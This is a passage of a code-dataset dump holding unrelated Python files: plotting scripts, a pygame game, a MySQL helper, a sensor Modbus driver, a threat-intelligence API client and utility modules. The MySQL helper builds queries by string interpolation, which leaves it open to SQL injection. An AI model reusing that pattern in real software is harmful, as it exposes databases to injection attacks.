\"__main__\":\n main()\n","sub_path":"week03/homework_6.py","file_name":"homework_6.py","file_ext":"py","file_size_in_byte":4179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"96261610","text":"import matplotlib.pyplot as plt\r\n\r\n\r\ndef end_results_part(points_x, points_y, fig_num, is_donor):\r\n plt.figure(fig_num)\r\n plt.subplot(111)\r\n if is_donor is 0:\r\n plt.suptitle(\"Error rates for different intron lengths (acceptor)\")\r\n else:\r\n plt.suptitle(\"Error rates for different intron lengths (donor)\")\r\n\r\n plt.xlabel(\"Intron length [nucleotides]\")\r\n plt.ylabel(\"Error rate [%]\")\r\n plt.plot(points_x, points_y)\r\n\r\n if is_donor is 0:\r\n plt.savefig(\"img/acceptor_errors\")\r\n else:\r\n plt.savefig(\"img/donor_errors\")\r\n\r\n plt.close()\r\n\r\n\r\ndef sample_errors_part(error_y, fig_num, is_donor, len_plus):\r\n plt.figure(fig_num)\r\n plt.subplot(111)\r\n if is_donor is 0:\r\n plt.suptitle(\"Example: error rates for one intron length (\"+str(len_plus)+\") (acceptor)\")\r\n else:\r\n plt.suptitle(\"Example: error rates for one intron length (\" + str(len_plus) + \") (donor)\")\r\n plt.xlabel(\"Intron length [nucleotides]\")\r\n plt.ylabel(\"Error rate [%]\")\r\n plt.plot(error_y)\r\n # plt.subplot(212)\r\n # plt.plot(t, 2*s1)\r\n\r\n if is_donor is 0:\r\n plt.savefig(\"img/acceptor_errors_sample\" + str(len_plus))\r\n else:\r\n plt.savefig(\"img/donor_errors_sample\" + str(len_plus))\r\n\r\n plt.close()\r\n\r\n\r\ndef end_results(donor_points_x, donor_points_y, acceptor_points_x, acceptor_points_y):\r\n end_results_part(donor_points_x, donor_points_y, 1, 1)\r\n end_results_part(acceptor_points_x, acceptor_points_y, 2, 0)\r\n\r\n\r\ndef sample_errors(donor_points_y, acceptor_points_y, len_plus):\r\n sample_errors_part(donor_points_y, 3, 1, len_plus+2)\r\n sample_errors_part(acceptor_points_y, 4, 0, len_plus*2+25)\r\n\r\n\r\ndef main(donor_points_x, donor_points_y, acceptor_points_x, acceptor_points_y):\r\n end_results(donor_points_x, donor_points_y, acceptor_points_x, acceptor_points_y)\r\n sample_errors(donor_points_x, donor_points_y, 10)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"GraphPlotter.py","file_name":"GraphPlotter.py","file_ext":"py","file_size_in_byte":1954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"277381515","text":"import pygame\n#from pygame_function import *\n# By Lisa and Jenny - all the images used are drawn by Lisa\n\npygame.init()\n\nscreen = pygame.display.set_mode((1440, 790))\n\nleft = False\nright = False\nup = False\ndown = False\nrunning = True\n\nclock = pygame.time.Clock()\n\n# background\nbackground = pygame.image.load(\"room.png\")\n\n#test\n#testSprite = makeSprite(\"q.gif\")\n\n# title icon\npygame.display.set_caption(\"The Adventure of A Magic Cat\")\n\n# Player\nPlayerI = pygame.image.load(\"o.png\")\n\npx = 200\npy = 300\npxc = 0\npyc = 0\np1 = 0\np2 = 0\ncount = {\"a\": '0', \"b\": '0', \"c\": '0', \"d\": '0'}\n\n# notif = pygame.image.load(\"n.png\")\nbox1 = pygame.image.load(\"box.png\")\nbox2 = pygame.image.load(\"box.png\")\nbox3 = pygame.image.load(\"box.png\")\nbox4 = pygame.image.load(\"box.png\")\nnt = False\nnt1 = True\nma = True\nma1 = False\nma2 = False\nt1 = False\nt2 = False\nt21 = True\nt22 = False\nt3 = False\nt4 = False\nfn = False\nbg = False\n\n\nwalk = [pygame.image.load(\"o.png\"), pygame.image.load(\"o.png\"), pygame.image.load(\"o.png\"), pygame.image.load(\"o2.png\"), pygame.image.load(\"o2.png\"), pygame.image.load(\"o2.png\"), pygame.image.load(\"o1.png\"), pygame.image.load(\"o1.png\"), pygame.image.load(\"o1.png\")]\nwalkr = [pygame.transform.flip(pygame.image.load(\"o.png\"), True, False), pygame.transform.flip(pygame.image.load(\"o.png\"), True, False), pygame.transform.flip(pygame.image.load(\"o.png\"), True, False), pygame.transform.flip(pygame.image.load(\"o1.png\"), True, False), pygame.transform.flip(pygame.image.load(\"o1.png\"), True, False), pygame.transform.flip(pygame.image.load(\"o1.png\"), True, False), pygame.transform.flip(pygame.image.load(\"o2.png\"), True, False), pygame.transform.flip(pygame.image.load(\"o2.png\"), True, False), pygame.transform.flip(pygame.image.load(\"o2.png\"), True, False)]\n\n\ndef f1(d, v):\n list = []\n\n for key in d:\n if str(d.get(key)) == v:\n return True\n if not list:\n return False\n return True\n\n\ndef player(x, y):\n screen.blit(PlayerI, (x, y))\n\n\ndef map1():\n global px\n global py\n global p1\n global p2\n\n global nt\n global nt1\n global background\n global st\n if st:\n px = -500\n py = -500\n redraw()\n pygame.time.delay(3000)\n px = 400\n py = 600\n st = False\n if px > 1300:\n px = p1\n py = p2\n if py < 130:\n px = p1\n py = p2\n if py > 670:\n px = p1\n py = p2\n if abs((400 - px)) < 100 and abs((350 - py)) < 100:\n nt = True\n if event.type == pygame.MOUSEBUTTONDOWN:\n nt1 = False\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_RETURN:\n nt1 = False\n if px <= 200:\n if 200 < py < 400 and px < 100:\n background = pygame.image.load(\"l.png\")\n px = -500\n py = -500\n redraw()\n pygame.time.delay(3000)\n background = pygame.image.load(\"map.png\")\n px = 300\n py = 50\n pygame.display.update()\n global ma\n ma = False\n global ma1\n ma1 = True\n elif py <= 200 or py >= 400:\n px = p1\n py = p2\n print (px, py)\n\n\ndef map2():\n global px\n global py\n global p1\n global p2\n global background\n\n global t1\n global t2\n global t3\n global t4\n global t22\n global t21\n if 50 < px < 250 and py < 410:\n px = p1\n py = p2\n if 350 < px < 550 and py < 170:\n px = p1\n py = p2\n if 350 < px < 550 and py > 250:\n px = p1\n py = p2\n if 550 < px < 750 and 50 < py < 170:\n px = p1\n py = p2\n if 700 < px < 860 and 50 < py < 530:\n px = p1\n py = p2\n if 1000 < px < 1160 and 50 < py:\n px = p1\n py = p2\n if py > 670 or py < -10 or px < 0 or px > 1310:\n px = p1\n py = p2\n if px < 20 and py < 50:\n px = 20\n py = 55\n global t12\n t1 = True\n t12 = True\n t21 = True\n pygame.display.update()\n if 350 > px > 300 and py > 575:\n px = 335\n py = 570\n\n t2 = True\n t22 = True\n t21 = True\n pygame.display.update()\n if 650 > px > 600 and py < 40:\n px = 680\n py = 40\n global t32\n t3 = True\n t32 = True\n t21 = True\n pygame.display.update()\n if px > 1250 and py > 590:\n px = 1230\n py = 560\n global t42\n t4 = True\n t42 = True\n t21 = True\n pygame.display.update()\n if not f1(count, '0'):\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_RETURN:\n global ma1\n # global fn\n global ma2\n background = pygame.image.load(\"food.png\")\n t1 = False\n t2 = False\n t3 = False\n t4 = False\n fn = True\n ma2 = True\n ma1 = False\n\n# print(px, py)\n\n\ndef map3():\n global background\n global px\n global py\n global bg\n global running\n px = -500\n py = -500\n\n if event.type == pygame.MOUSEBUTTONDOWN:\n background = pygame.image.load(\"food1.png\")\n redraw()\n pygame.time.delay(3000)\n background = pygame.image.load(\"cake.png\")\n redraw()\n pygame.time.delay(3000)\n background = pygame.image.load(\"cake1.png\")\n redraw()\n pygame.time.delay(3000)\n background = pygame.image.load(\"end.png\")\n redraw()\n pygame.time.delay(3000)\n running = False\n\n# Loop\nwalkCount = 0\n\nst = True\n\ndef redraw():\n # screen background color rgb\n # background image\n\n global nt\n global walkCount\n global p1\n global p2\n global count\n global background\n global st\n global px\n global py\n screen.blit(background, (0, 0))\n\n if st:\n\n screen.blit(pygame.image.load(\"start.png\"), (0, 0))\n p1 = px\n p2 = py\n if walkCount + 1 >= 27:\n walkCount = 0\n if left:\n screen.blit(walk[walkCount//3], (px, py))\n walkCount +=1\n elif right:\n screen.blit(walkr[walkCount // 3], (px, py))\n walkCount += 1\n elif up:\n screen.blit(walk[walkCount // 3], (px, py))\n walkCount += 1\n elif down:\n screen.blit(walk[walkCount // 3], (px, py))\n walkCount += 1\n else:\n player(px, py)\n if nt and nt1:\n screen.blit(pygame.image.load(\"book.png\"), (450, 300))\n\n if t1:\n screen.blit(box1, (17, 13))\n if t12 and t21:\n screen.blit(pygame.image.load(\"egg.png\"), (450, 300))\n count[\"a\"] = '1'\n\n if t2:\n screen.blit(box2, (390, 700))\n if t22 and t21:\n screen.blit(pygame.image.load(\"choc.png\"), (450, 300))\n count[\"b\"] = '1'\n\n if t3:\n screen.blit(box3, (603, 60))\n if t32 and t21:\n screen.blit(pygame.image.load(\"flour.png\"), (450, 300))\n count[\"c\"] = '1'\n\n if t4:\n screen.blit(box4, (1340, 710))\n if t42 and t21:\n screen.blit(pygame.image.load(\"milk.png\"), (450, 300))\n count[\"d\"] = '1'\n #if fn:\n #screen.blit(pygame.image.load(\"milk.png\"), (450, 300))\n if bg:\n screen.blit(pygame.image.load(\"end.png\"), (450, 300))\n pygame.display.update()\n\n\nwhile running:\n clock.tick(27)\n # call to player and other objects\n px = px + pxc\n py = py + pyc\n\n # update screen\n pygame.display.update()\n\n # main character action\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_LEFT:\n pxc -= 5\n left = True\n right = False\n up = False\n down = False\n elif event.key == pygame.K_RIGHT:\n pxc += 5\n left = False\n right = True\n up = False\n down = False\n elif event.key == pygame.K_UP:\n pyc -= 5\n left = False\n right = False\n up = True\n down = False\n elif event.key == pygame.K_DOWN:\n pyc += 5\n left = False\n right = False\n up = False\n down = True\n else:\n left = False\n right = False\n up = False\n down = False\n walkCount = 0\n if event.type == pygame.KEYUP:\n pxc = 0\n pyc = 0\n left = False\n right = False\n up = False\n down = False\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_RETURN:\n t21 = False\n t12 = False\n t22 = False\n t32 = False\n t42 = False\n fn = False\n nt = False\n nt1 = False\n if ma:\n map1()\n if ma1:\n map2()\n if ma2:\n map3()\n redraw()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"16235979","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n# @Time : 2021/2/6 12:11\n# @Author : LGH\n# @File : MyDb.py\n# @Software: PyCharm\n\nfrom collections import defaultdict\nimport pymysql\nimport yaml\n\n\nclass MyDb:\n\n def __init__(self):\n with open(\"./conf.yaml\", \"r\") as f:\n cfg = yaml.safe_load(f)\n \n self.name = cfg[\"MyDb\"][\"name\"]\n self.passwd = cfg[\"MyDb\"][\"passwd\"]\n self.dbname = cfg[\"MyDb\"][\"dbname\"]\n self.port = cfg[\"MyDb\"][\"port\"]\n self.host = cfg[\"MyDb\"][\"host\"]\n self.db = None\n\n def connect_db(self):\n self.db = pymysql.connect(host=self.host, user=self.name, password=self.passwd, database=self.dbname)\n return self.db\n\n def get_info(self, name):\n while True:\n try:\n # print(name)\n cursor = self.db.cursor()\n select_command = u\"select hostIp from cdnChannel where channelMark='%s';\" % name\n cursor.execute(select_command)\n results = cursor.fetchall()\n # print(type(results))\n name_list = []\n # print('results: {}'.format(results))\n if len(results) != 0:\n name_list.append(name)\n server_dict1 = defaultdict(list)\n for n in results:\n server_dict1[n[0]].append(name)\n else:\n select_command1 = 'select hostIp,channelMark from cdnChannel where channelMark like \"%' + name + '@%\";'\n # print(select_command1)\n cursor.execute(select_command1)\n results = cursor.fetchall()\n print('results: {}'.format(results))\n server_dict1 = defaultdict(list)\n for n in results:\n if n[1] not in name_list:\n name_list.append(n[1])\n server_dict1[n[0]].append(n[1])\n # print('get-server_dict: {}'.format(server_dict1))\n # print('name_list: {}'.format(name_list))\n # 返回ip列表\n break\n except pymysql.OperationalError as e:\n print(e)\n self.db.ping()\n self.connect_db()\n # print('name_list: {}'.format(name_list))\n # print('server_dict: {}'.format(server_dict1))\n return name_list, server_dict1\n\n def close(self, connect_db):\n connect_db.close()","sub_path":"change_name/MyDb.py","file_name":"MyDb.py","file_ext":"py","file_size_in_byte":2527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"93862818","text":"import datetime\ndef printTimeStamp(name):\n print('Автор програми: ' + name)\n print('Час компіляції: ' + str(datetime.datetime.now()))\nprintTimeStamp('Лапін Костянтин')\n\n\ndef Exponentiation(x,n):\n if n == 0:\n return 1\n elif n > 0:\n if n%2 == 0:\n return (x**(n/2))**2\n else:\n return x *Exponentiation(x,n-1)\n\n\n elif n < 0:\n\n return 1/(x**-n)\n\n\nprint(Exponentiation(2,4))","sub_path":"day 3/A/17.py","file_name":"17.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"279597252","text":"'''\nDyacon TPH-1 Sensor\n- Platform: Windows\n- Connection: USB-RS485\n- Interface: DataBear Sensor Interface V0\n\n'''\n\nimport datetime\nimport minimalmodbus as mm\n\nclass dyaconTPH:\n #Inherit from \"modbus sensor class\"?\n def __init__(self,name,settings):\n '''\n Create a new Dyacon TPH sensor\n Inputs\n - Name for sensor\n - settings['serialnum'] = Serial Number\n - settings['port'] = Serial com port\n - settings['address'] = Sensor modbus address\n '''\n self.name = name\n self.sn = settings['serialnumber']\n self.port = settings['port']\n self.address = settings['address']\n self.frequency = settings['measurement']\n\n #Serial settings\n self.rs = 'RS485'\n self.duplex = 'half'\n self.resistors = 1\n self.bias = 1\n\n #Define characteristics of this sensor\n self.sensor_type = 'polled'\n self.maxfrequency = 1 #Maximum frequency in seconds the sensor can be polled\n\n #Define measurements\n airT = {'name':'airT','register':210,'regtype':'float'}\n rh = {'name':'rh','register':212,'regtype':'float'}\n bp = {'name':'bp','register':214,'regtype':'float'}\n self.measurements = [airT,rh,bp]\n\n #Setup measurement\n self.comm = mm.Instrument(self.port,self.address)\n self.comm.serial.timeout = 0.3\n\n #Initialize data structure\n self.data = {'airT':[],'rh':[],'bp':[]} #Empty data dictionary\n\n def measure(self):\n '''\n Read in data using modbus\n '''\n for measure in self.measurements:\n dt = datetime.datetime.now()\n val = self.comm.read_float(measure['register'])\n\n #Output results for testing\n timestamp = dt.strftime('%Y-%m-%d %H:%M:%S %f')\n print('Measure {}: {}, value= {}'.format(measure['name'],timestamp,val))\n\n self.data[measure['name']].append((dt,val))\n\n\n def cleardata(self,name):\n '''\n Clear data values for a particular measurement\n '''\n self.data[name] = []\n","sub_path":"databear/sensors/dyaconTPH1.py","file_name":"dyaconTPH1.py","file_ext":"py","file_size_in_byte":2115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"460238905","text":"import warnings\n\nimport requests\nfrom requests.exceptions import ReadTimeout\nimport copy\nimport logging\n\nfrom .apiclient import BaseApiClient, DEFAULT_AUTH, DEFAULT_TIMEOUT, \\\n DEFAULT_RETRIES\nfrom . import RAW_API_URL\nfrom .dotindex import dot_index\nfrom .datamodel import Entity, \\\n Reference, \\\n Event, \\\n DotAccessDict\nfrom .query import BaseQuery, \\\n ReferenceQuery, \\\n EntityQuery, \\\n EventQuery, \\\n get_query_type\n\nfrom .query import JSONQueryResponse, \\\n CSVQueryResponse\n\n# pylint: disable=unused-import\nfrom .error import RemoteServerError, InvalidRFQError\n\nLOG = logging.getLogger(__name__)\n\n\nclass RawApiClient(BaseApiClient):\n \"\"\"Provides simplified access to the Recorded Future API.\n\n The api object will handle authentication and encapsulation of\n a query.\n\n Ex:\n >>> api = RawApiClient()\n >>> query = EntityQuery(type=\"Company\", name=\"Recorded Future\")\n >>> result = api.query(query)\n >>> type(result)\n \n >>> int(result.total_count)\n 1\n \"\"\"\n\n def __init__(self,\n auth=DEFAULT_AUTH,\n url=RAW_API_URL,\n proxies=None,\n timeout=DEFAULT_TIMEOUT,\n app_name=None,\n app_version=None,\n pkg_name=None,\n pkg_version=None,\n accept_gzip=True,\n platform=None):\n \"\"\"Initialize API.\n\n Args:\n auth: If a token (string) is provided it will be used,\n otherwise the environment variables RF_TOKEN (or legacy\n RECFUT_TOKEN) are expected.\n Also accepts a requests.auth.AuthBase object\n url: Recorded Future API url\n proxies: Same format as used by requests.\n timeout: connection and read timeout used by the requests lib.\n app_name: an app name which is added to the user-agent http\n header (ex \"ExampleApp\").\n app_version: an app version which is added to the user-agent http\n header (ex \"1.0\"). Use of this requires app_name above.\n pkg_name and pkg_version: same as above for package.\n accept_gzip: whether or not we access gzip compressed data or not\n platform: id of the platform running the script (ex Splunk_1.2.3)\n\n See http://docs.python-requests.org/en/master/user/advanced/#proxies\n for more information about proxies.\n \"\"\"\n BaseApiClient.__init__(self, auth, url,\n proxies, timeout,\n app_name, app_version,\n pkg_name, pkg_version,\n accept_gzip,\n platform)\n\n # pylint: disable=too-many-branches\n def query(self, query, params=None, tries_left=DEFAULT_RETRIES):\n \"\"\"Perform a standard query.\n\n Args:\n query: a dict containing the query.\n params: a dict with additional parameters for the API request.\n tries_left: number of retries for read timeouts\n\n Returns:\n QueryResponse object\n \"\"\"\n\n # defer checking auth until we actually query.\n self._check_auth()\n\n query = copy.deepcopy(query)\n\n params = self._prepare_params(params)\n headers = self._prepare_headers()\n response = None\n\n query_type = get_query_type(query)\n is_scan = (query_type in query and\n query[query_type].get(\"searchtype\") == \"scan\")\n try:\n LOG.debug(\"Requesting query json=%s\", query)\n response = self._request_session.post(self._url,\n json=query,\n params=params,\n headers=headers,\n auth=self._auth,\n proxies=self._proxies,\n timeout=self._timeout)\n response.raise_for_status()\n\n except requests.HTTPError as req_http_err:\n if response.status_code == 502 or response.status_code == 503:\n # gateway error or service unavailable, ok to retry\n if tries_left > 0:\n tries_left -= 1\n msg = \"Got error with status=%s. \" \\\n \"Retrying with tries=%s left\"\n LOG.warning(msg, response.status_code, tries_left)\n return self.query(query,\n params=params,\n tries_left=tries_left)\n\n msg = \"An exception occurred during the query: %s. \" \\\n \"Error was: %s\"\n LOG.exception(msg, query, response.content)\n self._raise_http_error(response, req_http_err)\n\n except ReadTimeout:\n\n if is_scan and \"page_start\" in query[query_type]:\n # we will get illegal page start if we retry\n raise\n\n if tries_left > 0:\n LOG.exception(\"Read timeout during query. \"\n \"Retrying. Attempts left: %s\", tries_left)\n tries_left -= 1\n return self.query(query,\n params=params,\n tries_left=tries_left)\n else:\n raise\n\n except requests.RequestException:\n LOG.exception(\"Exception occurred during query: %s.\", query)\n raise\n\n expect_json = not (\"output\" in query and\n query['output'].get(\"format\", \"json\") != \"json\")\n return self._make_response(expect_json, response)\n\n def _validate_json_response(self, resp):\n if resp.get('status', '') == 'FAILURE':\n msg = \"Server failure:\\n\" \\\n \"HTTP Status: {code}\\t\" \\\n \"Message: {error}\"\n code = resp.get('code', None)\n error = resp.get('error', 'NONE')\n msg = msg.format(code=code, error=error)\n raise RemoteServerError(msg)\n\n # pylint: disable=too-many-arguments,too-many-locals,too-many-branches\n def paged_query(self,\n query,\n limit=None,\n batch_size=1000,\n field=None,\n unique=False,\n raw=False):\n \"\"\"Generator for paged query results.\n\n Args:\n query: a dict containing the query.\n limit: optional int, return a max of limit result units\n field: optional string with dot-notation for getting specific\n fields.\n batch_size: optional int\n unique: optional bool for filtering to unique values.\n raw: return raw QueryResponse object\n\n \"\"\"\n query = copy.deepcopy(query)\n query_type = get_query_type(query)\n if not query_type:\n msg = 'Unknown query type {}. Unable to page query.'\n raise InvalidRFQError(msg.format(query_type), query)\n\n # Check for aggregate queries\n output = query.get('output')\n if isinstance(output, dict) and 'count' in output:\n msg = 'Aggregate query cannot be used in paging'\n raise InvalidRFQError(msg, query)\n\n if 'limit' in query[query_type]:\n msg = \"Ignoring limit in query, use limit \" \\\n \"and batch_size arguments in paged queries.\"\n warnings.warn(msg, SyntaxWarning)\n\n if limit is None:\n query[query_type]['limit'] = batch_size\n else:\n query[query_type]['limit'] = min(batch_size, limit)\n\n seen = set()\n n_results = 0\n # pylint: disable=too-many-nested-blocks\n while True:\n query_response = self.query(query)\n\n if raw:\n n_results += query_response.returned_count\n yield query_response\n\n elif isinstance(query_response, JSONQueryResponse):\n if field is None:\n n_results += query_response.returned_count\n yield query_response.result\n else:\n tmp = dot_index(field, query_response.result)\n for item in tmp:\n if unique:\n if item in seen:\n continue\n seen.add(item)\n n_results += 1\n yield item\n if limit is not None and n_results >= limit:\n # ok, we are done\n return\n elif isinstance(query_response, CSVQueryResponse):\n csv_reader = query_response.csv_reader()\n if n_results == 0:\n yield csv_reader.fieldnames\n\n for row in csv_reader:\n n_results += 1\n yield row\n if limit is not None and n_results >= limit:\n # ok we are done\n return\n else:\n # XML, just return plain response\n n_results += query_response.returned_count\n yield query_response\n\n LOG.debug(\"Received %s/%s items\", n_results,\n query_response.total_count)\n if query_response.total_count <= n_results:\n return\n\n if not query_response.has_more_results:\n return\n\n if limit is not None and n_results >= limit:\n return\n\n query[query_type][\"page_start\"] = query_response.next_page_start\n\n def get_references(self, query, limit=20):\n \"\"\"Fetch references (aka instances).\n\n Args:\n query: the 'instance' part of an RF API query.\n limit: limit number of references in response.\n Set to None for no limit\n\n Returns:\n An iterator of References.\n\n Ex:\n >>> api = RawApiClient()\n >>> type(next(api.get_references({\"type\": \"CyberAttack\"}, limit=20)))\n \n \"\"\"\n ref_query = ReferenceQuery(query)\n refs = self.paged_query(ref_query, limit=limit, field=\"instances\")\n for ref in refs:\n yield Reference(ref)\n\n def get_events(self, query, limit=20):\n \"\"\"Fetch events.\n\n Args:\n query: the 'cluster' part of an RF API query.\n limit: limit number of events in response. Set to None for no limit\n\n Returns:\n An iterator of Events.\n\n Ex:\n >>> api = RawApiClient()\n >>> type(next(api.get_events({\"type\": \"CyberAttack\"}, limit=20)))\n \n \"\"\"\n event_query = EventQuery(query)\n events = self.paged_query(event_query, limit=limit, field=\"events\")\n for event in events:\n yield Event(event)\n\n def get_entity(self, entity_id):\n \"\"\"Get an entity.\n\n Args:\n entity_id: the unique id of the entity\n\n Returns:\n An entity\n\n Ex:\n >>> api = RawApiClient()\n >>> str(api.get_entity('ME4QX').name)\n 'Recorded Future'\n \"\"\"\n resp = self.query(EntityQuery(id=entity_id))\n try:\n entity = Entity(resp.result['entity_details'][entity_id])\n entity.id = entity_id\n return entity\n except KeyError:\n return None\n\n def get_entities(self, query, limit=20):\n \"\"\"Get a list of matching entities.\n\n Args:\n query: the query\n limit: on return this many matches\n\n Returns:\n An iterator yielding Entities.\n\n Ex:\n >>> api = RawApiClient()\n >>> type(next(api.get_entities({\"type\": \"Company\"}, limit=20)))\n \n \"\"\"\n entities = self.paged_query(EntityQuery(query),\n limit=limit,\n field=\"entity_details\")\n\n for (key, value) in entities:\n entity = Entity(value)\n entity.id = key\n yield entity\n\n def get_status(self, show_statistics=True):\n \"\"\"Find out your token's API usage, broken down by day.\"\"\"\n query = {\"status\": {}}\n if show_statistics:\n query[\"output\"] = {\"statistics\": True}\n resp = self.query(BaseQuery(query))\n return DotAccessDict(resp.result)\n\n def get_metadata(self):\n \"\"\"Get metadata of types and events.\"\"\"\n resp = self.query(BaseQuery(metadata=dict()))\n # pylint: disable=no-member\n return DotAccessDict(resp.result).types\n","sub_path":"rfapi/rawapiclient.py","file_name":"rawapiclient.py","file_ext":"py","file_size_in_byte":12930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"306058323","text":"# =============================================================================\n# Authors: PAR Government\n# Organization: DARPA\n#\n# Copyright (c) 2016 PAR Government\n# All rights reserved.\n#==============================================================================\n\nfrom os.path import expanduser\nimport new\nfrom types import MethodType\nimport logging\nfrom threading import RLock\n\nclass Proxy(object):\n def __init__(self, target):\n self._target = target\n\n def __getattr__(self, name):\n target = self._target\n f = getattr(target, name)\n if isinstance(f, MethodType):\n # Rebind the method to the target.\n return new.instancemethod(f.im_func, self, target.__class__)\n else:\n return f\n\ndef removeValue(obj, path):\n\n part = path\n splitpos = path.find(\".\")\n\n if splitpos > 0:\n part = path[0:splitpos]\n path = path[splitpos + 1:]\n else:\n path = None\n\n bpos = part.find('[')\n pos = 0\n if bpos > 0:\n pos = int(part[bpos + 1:-1])\n part = part[0:bpos]\n\n if part in obj:\n current_value = obj[part]\n if path is None:\n if type(current_value) is list or type(current_value) is tuple :\n obj[part] = tuple(list(current_value[:pos]) + list(current_value[pos+1:]))\n return current_value[pos]\n else:\n return obj.pop(part)\n else:\n if bpos > 0:\n current_value = current_value[pos]\n return removeValue(current_value,path)\n\n\ndef setPathValue(d, path, value):\n pos = path.find('.')\n lbracket = path.find('[')\n listpos = None\n nextpath = path[pos + 1:] if pos > 0 else None\n if lbracket > 0 and (pos < 0 or lbracket < pos):\n rbracket = path.find(']')\n listpos = int(path[lbracket + 1:rbracket])\n pos = lbracket\n if pos < 0:\n if listpos is not None:\n d[path][listpos] = value\n elif value is None and path in d:\n d.pop(path)\n elif value is not None:\n d[path] = value\n elif listpos is not None:\n setPathValue(d[path[0:pos]][listpos], nextpath, value)\n else:\n if path[0:pos] not in d:\n d[path[0:pos]] = {}\n setPathValue(d[path[0:pos]], nextpath, value)\n\ndef getPathValuesFunc(path):\n from functools import partial\n\n def getValuePath(path, d, **kwargs):\n return getPathValues(d, path)\n\n return partial(getValuePath, path)\n\n\ndef getPathValues(d, path):\n \"\"\"\n Given a nest structure,\n return all the values reference by the given path.\n Always returns a list.\n If the value is not found, the list is empty\n\n NOTE: Processing a list is its own recursion.\n \"\"\"\n pos = path.find('.')\n currentpath = path[0:pos] if pos > 0 else path\n nextpath = path[pos + 1:] if pos > 0 else None\n lbracket = path.find('[')\n itemnum = None\n if lbracket >= 0 and (pos < 0 or lbracket < pos):\n rbracket = path.find(']')\n itemnum = int(path[lbracket + 1:rbracket])\n currentpath = path[0:lbracket]\n # keep the bracket for the next recurive depth\n nextpath = path[lbracket:] if lbracket > 0 else nextpath\n if type(d) is list:\n result = []\n if itemnum is not None:\n result.extend(getPathValues(d[itemnum], nextpath))\n else:\n for item in d:\n # still on the current path node\n result.extend(getPathValues(item, path))\n return result\n if pos < 0:\n if currentpath == '*':\n result = []\n for k, v in d.iteritems():\n result.append(v)\n return result\n return [d[currentpath]] if currentpath in d and d[currentpath] else []\n else:\n if currentpath == '*':\n result = []\n for k, v in d.iteritems():\n result.extend(getPathValues(v, nextpath))\n return result\n return getPathValues(d[currentpath], nextpath) if currentpath in d else []\n\ndef getValue(obj, path, defaultValue=None, convertFunction=None):\n \"\"\"\"Return the value as referenced by the path in the embedded set of dictionaries as referenced by an object\n obj is a node or edge\n path is a dictionary path: a.b.c\n convertFunction converts the value\n\n This function recurses\n \"\"\"\n if obj is None:\n return defaultValue\n if not path:\n return convertFunction(obj) if convertFunction and obj is not None else (defaultValue if obj is None else obj)\n\n current = obj\n part = path\n splitpos = path.find(\".\")\n\n if splitpos > 0:\n part = path[0:splitpos]\n path = path[splitpos + 1:]\n else:\n path = None\n\n bpos = part.find('[')\n pos = 0\n if bpos > 0:\n pos = int(part[bpos + 1:-1])\n part = part[0:bpos]\n\n if part in current:\n current = current[part]\n if type(current) is list or type(current) is tuple:\n if bpos > 0:\n current = current[pos]\n else:\n result = []\n for item in current:\n v = getValue(item, path, defaultValue=defaultValue, convertFunction=convertFunction)\n if v is not None:\n result.append(v)\n return result\n return getValue(current, path, defaultValue=defaultValue, convertFunction=convertFunction)\n return defaultValue\n\nclass MaskgenThreadPool:\n\n def __init__(self,size):\n from multiprocessing.pool import ThreadPool\n if size > 1:\n self.thread_pool = ThreadPool(size)\n else:\n self.thread_pool = None\n\n def apply_async(self, func, args=(), kwds={}):\n if self.thread_pool is not None:\n return self.thread_pool.apply_async(func, args=args, kwds=kwds)\n else:\n from multiprocessing.pool import AsyncResult\n result = AsyncResult({},False)\n result._set(0,(True,func(*args, **kwds)))\n return result\n\n\n\nclass ModuleStatus:\n\n def __init__(self,system_name, module_name, component, percentage):\n self.system_name = system_name\n self.module_name = module_name\n self.component = component\n self.percentage = percentage\n\n\nclass StatusTracker:\n def __init__(self, system_name='System', module_name='?', amount=100, status_cb=None):\n self.amount = amount\n self.system_name = system_name\n self.module_name = module_name\n self.current = 0\n self.lock = RLock()\n self.status_cb = status_cb\n self.logger = logging.getLogger('maskgen')\n\n def post(self, module_status):\n \"\"\"\n\n :param module_status:\n :return:\n @type module_status : ModuleStatus\n \"\"\"\n if self.status_cb is None:\n self.logger.info(\n '{} module {} for component {}: {}% Complete'.format(module_status.system_name,\n module_status.module_name,\n module_status.component,\n module_status.percentage))\n else:\n self.status_cb(module_status)\n\n def complete(self):\n self.post(ModuleStatus(self.system_name, self.module_name, 'Complete',100.0))\n\n def next(self,id):\n with self.lock:\n self.post(ModuleStatus(self.system_name, self.module_name, id, (float(self.current)/self.amount)*100.0))\n self.current += 1\n\n","sub_path":"maskgen/support.py","file_name":"support.py","file_ext":"py","file_size_in_byte":7641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"541510409","text":"from django.urls import path\r\nfrom Users import views\r\n\r\n\r\nurlpatterns = [\r\n path('signup',views.SignUp, name = 'signup'),\r\n path('login',views.Login, name = 'login'),\r\n path('logout',views.logout,name='logout'),\r\n # path('profile',views.profile, name = 'profile'),\r\n \r\n\r\n]\r\n","sub_path":"Voyage_Proj/Users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"163365657","text":"import pygame\nfrom pygame.locals import *\nimport time\ndef variable():\n black = (0, 0, 